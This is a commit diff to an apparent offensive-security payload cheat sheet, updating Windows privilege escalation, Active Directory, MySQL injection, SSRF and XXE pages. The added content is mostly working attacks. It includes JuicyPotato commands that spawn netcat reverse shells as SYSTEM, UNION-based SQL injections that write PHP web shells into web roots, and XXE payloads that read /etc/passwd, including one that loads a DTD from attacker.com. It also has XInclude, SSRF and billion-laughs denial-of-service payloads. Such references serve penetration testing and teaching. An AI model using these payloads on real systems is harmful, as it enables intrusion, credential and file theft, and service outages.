Juicy Potato + XXE update

Methodology and Resources/Active Directory Attack.md

@@ -9,8 +9,8 @@
   * [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
   * [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
   * [Password in AD User comment](#password-in-ad-user-comment)
-  * [Pass-the-Ticket Golden Tickets](#passtheticket-golden-tickets)
+  * [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
-  * [Pass-the-Ticket Silver Tickets](#passtheticket-silver-tickets)
+  * [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
   * [Kerberoast](#kerberoast)
   * [KRB_AS_REP roasting](#krb_as_rep-roasting)
   * [Pass-the-Hash](#pass-the-hash)

Methodology and Resources/Windows - Privilege Escalation.md

@@ -721,9 +721,14 @@ Binary available at : https://github.com/ohpe/juicy-potato/releases
 3. Execute JuicyPotato to run a privileged command.
 
     ```powershell
-    juicypotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7}
+    JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7}
-    juicypotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
+    JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
-    # -l : local listener port
+    JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe"
+        Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337
+        ......
+        [+] authresult 0
+        {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM
+        [+] CreateProcessWithTokenW OK
     ```
 
 ## EoP - Common Vulnerabilities and Exposure

SQL Injection/MySQL Injection.md

@@ -24,6 +24,8 @@
 * [MYSQL Current queries](#mysql-current-queries)
 * [MYSQL Read content of a file](#mysql-read-content-of-a-file)
 * [MYSQL Write a shell](#mysql-write-a-shell)
+    * [Into outfile method](#into-outfile-method)
+    * [Into dumpfile method](#into-dumpfile-method)
 * [MYSQL UDF command execution](#mysql-udf-command-execution)
 * [MYSQL Truncation](#mysql-truncation)
 * [MYSQL Out of band](#mysql-out-of-band)
@@ -293,14 +295,22 @@ GRANT FILE ON *.* TO 'root'@'localhost'; FLUSH PRIVILEGES;#
 
 ## MYSQL Write a shell
 
+### Into outfile method
+
 ```sql
-SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
+[...] UNION SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
-SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
+[...] UNION SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>'
--1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
 [...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- -
 [...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
 ```
 
+### Into dumpfile method
+
+```sql
+[...] UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
+[...] UNION SELECT 0x3c3f7068702073797374656d28245f4745545b2763275d293b203f3e INTO DUMPFILE '/var/www/html/images/shell.php';
+```
+
 ## MYSQL Truncation
 
 In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.

Server Side Request Forgery/README.md

@@ -644,4 +644,5 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
 - [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
 - [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/)
 - [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf)
-- [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet)
+- [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet)
+- [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/)

XXE Injection/README.md

@@ -12,11 +12,16 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
 
 - [Tools](#tools)
 - [Detect the vulnerability](#detect-the-vulnerability)
-- [Read file content](#read-file-content)
+- [Exploiting XXE to retrieve files](#exploiting-xxe-to-retrieve-files)
-- [PHP Wrapper inside XXE](#php-wrapper-inside-xxe)
+  - [Classic XXE](#classic-xxe)
-- [XXE to SSRF](#xxe-to-ssrf)
+  - [Classic XXE Base64 encoded](#classic-xxe-base64-encoded)
-- [Deny of service](#deny-of-service)
+  - [PHP Wrapper inside XXE](#php-wrapper-inside-xxe)
-- [Blind XXE - Out of Band](#blind-xxe---out-of-Band)
+  - [XInclude attacks](#xinclude-attacks)
+- [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks)
+- [Exploiting XXE to perform a deny of service](#exploiting-xxe-to-perform-a-deny-of-service)
+  - [Billion Laugh Attack](#billion-laugh-attack)
+- [Error Based XXE](#error-based-xxe)
+- [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band)
   - [Blind XXE](#blind-xxe)
   - [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013)
   - [XXE OOB with DTD and PHP filter](#xxe-oob-with-dtd-and-php-filter)
@@ -53,9 +58,11 @@ Basic entity test, when the XML parser parses the external entities the result s
 
 It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server.
 
-## Read file content
+## Exploiting XXE to retrieve files
 
-Classic XXE, we try to display the content of the file `/etc/passwd` 
+### Classic XXE
+
+We try to display the content of the file `/etc/passwd` 
 
 ```xml
 <?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
@@ -93,14 +100,13 @@ Classic XXE, we try to display the content of the file `/etc/passwd`
   <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
 ```
 
-
+### Classic XXE Base64 encoded
-Classic XXE Base64 encoded
 
 ```xml
 <!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
 ```
 
-## PHP Wrapper inside XXE
+### PHP Wrapper inside XXE
 
 ```xml
 <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
@@ -124,7 +130,16 @@ Classic XXE Base64 encoded
 <foo>&xxe;</foo>
 ```
 
-## XXE to SSRF
+### XInclude attacks
+
+When you can't modify the **DOCTYPE** element use the **XInclude** to target 
+
+```xml
+<foo xmlns:xi="http://www.w3.org/2001/XInclude">
+<xi:include parse="text" href="file:///etc/passwd"/></foo>
+```
+
+## Exploiting XXE to perform SSRF attacks
 
 XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) to target another service on the network.
 
@@ -132,17 +147,17 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [
 <!ELEMENT foo ANY >
-<!ENTITY % xxe SYSTEM "http://secret.dev.company.com/secret_pass.txt" >
+<!ENTITY % xxe SYSTEM "http://internal.service/secret_pass.txt" >
 ]>
 <foo>&xxe;</foo>
 ```
 
 
-## Deny of service
+## Exploiting XXE to perform a deny of service
 
 :warning: : These attacks might kill the service or the server, do not use them on the production.
 
-Billion Laugh Attack
+### Billion Laugh Attack
 
 ```xml
 <!DOCTYPE data [
@@ -155,7 +170,7 @@ Billion Laugh Attack
 <data>&a4;</data>
 ```
 
-Yaml attack
+### Yaml attack
 
 ```xml
 a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
@@ -169,7 +184,30 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
 i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
 ```
 
-## Blind XXE - Out of Band
+
+## Error Based XXE
+
+**Payload to trigger the XXE**
+
+```xml
+<?xml version="1.0" ?>
+<!DOCTYPE message [
+    <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
+    %ext;
+]>
+<message></message>
+```
+
+**Contents of ext.dtd**
+```xml
+<!ENTITY % file SYSTEM "file:///etc/passwd">
+<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
+%eval;
+%error;
+```
+
+
+## Exploiting blind XXE to exfiltrate data out-of-band
 
 Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.
 
@@ -301,7 +339,7 @@ GIF (experimental)
 * [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)
 * [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
 * [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
-* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf)
+* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 - Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf)
 * [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm)
 * [Understanding Xxe From Basic To Blind - 10/11/2018 - Utkarsh Agrawal](http://agrawalsmart7.com/2018/11/10/Understanding-XXE-from-Basic-to-Blind.html)
 * [From blind XXE to root-level file read access - December 12, 2018 by Pieter Hiele](https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/)
@@ -312,3 +350,5 @@ GIF (experimental)
 * [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/)
 * [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
 * [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html)
+* [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
+* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)